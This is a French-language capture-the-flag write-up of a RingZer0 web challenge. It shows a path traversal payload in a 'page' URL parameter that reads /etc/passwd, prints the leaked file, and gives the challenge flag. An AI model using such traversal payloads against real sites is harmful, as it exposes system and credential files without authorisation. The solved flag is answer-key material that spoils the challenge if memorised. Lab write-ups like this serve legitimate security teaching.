Skip to content

Looking for password file

Description

Write Up: Njal
Catégorie: Web
Author : Mr.Un1k0d3r
Difficulté: Unknown

Enoncé

Juste l'indication : Looking for password file

Solution détaillée

Afin de trouver le fichier de mots de passe et le flag associé, on réalise les étapes suivantes :

  1. Reconnaissance et choix de l'attaque : En accédant au challenge, on arrive sur la page d'un site web, on trouve uniquement du texte de type "Lorem ipsum" sans importance. Rien n'indique la présence du fichier contenant les mots de passe. On s'intéresse alors à l'URL et à la possibilité de réussir une attaque de traversée de chemin (Path Traversal).

  2. Réalisation de l'attaque Path Traversal : L'URL de la page lorem ipsum est la suivante : http://challenges.ringzer0ctf.com:10075/?page=lorem.php Le fichier est un fichier php. Le serveur sur lequel il est stocké est donc très certainement un serveur apache et par corollaire une machine linux. On sait que le fichier qui regroupe les noms et mots de passe d'utilisateurs sur un système linux est /etc/passwd. On doit donc augmenter de plusieurs niveaux dans la structure du répertoire jusqu'au dossier racine dans le système de fichier et de là accéder au fichier /etc/passwd . Pour ce faire, via la barre d'adresse de notre navigateur, on saisit l'URL suivante : challenges.ringzer0ctf.com:10075/?page=../../../etc/passwd . C'est bien point point et pas point point point (Problème d'affichage correcte du chemin) On requête ainsi le serveur du site visé pour qu'il nous retourne le contenu du fichier de mots de passe. Et là, bingo ! Le contenu du fichier qui s'affiche dans notre navigateur est bien ce que l'on voulait et on y retrouve le flag: About Us root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:FLAG-zH9g1934v774Y7Zx5s16t5ym8Z:/nonexistent:/usr/sbin/nologin systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin messagebus:x:103:106::/nonexistent:/usr/sbin/nologin syslog:x:104:110::/home/syslog:/usr/sbin/nologin _apt:x:105:65534::/nonexistent:/usr/sbin/nologin tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin sshd:x:109:65534::/run/sshd:/usr/sbin/nologin landscape:x:110:115::/var/lib/landscape:/usr/sbin/nologin pollinate:x:111:1::/var/cache/pollinate:/bin/false systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false

Flag : FLAG-zH9g1934v774Y7Zx5s16t5ym8Z

  1. Soumettre le flag :
    • Enfin, on soumet le flag " FLAG-zH9g1934v774Y7Zx5s16t5ym8Z" pour résoudre le challenge.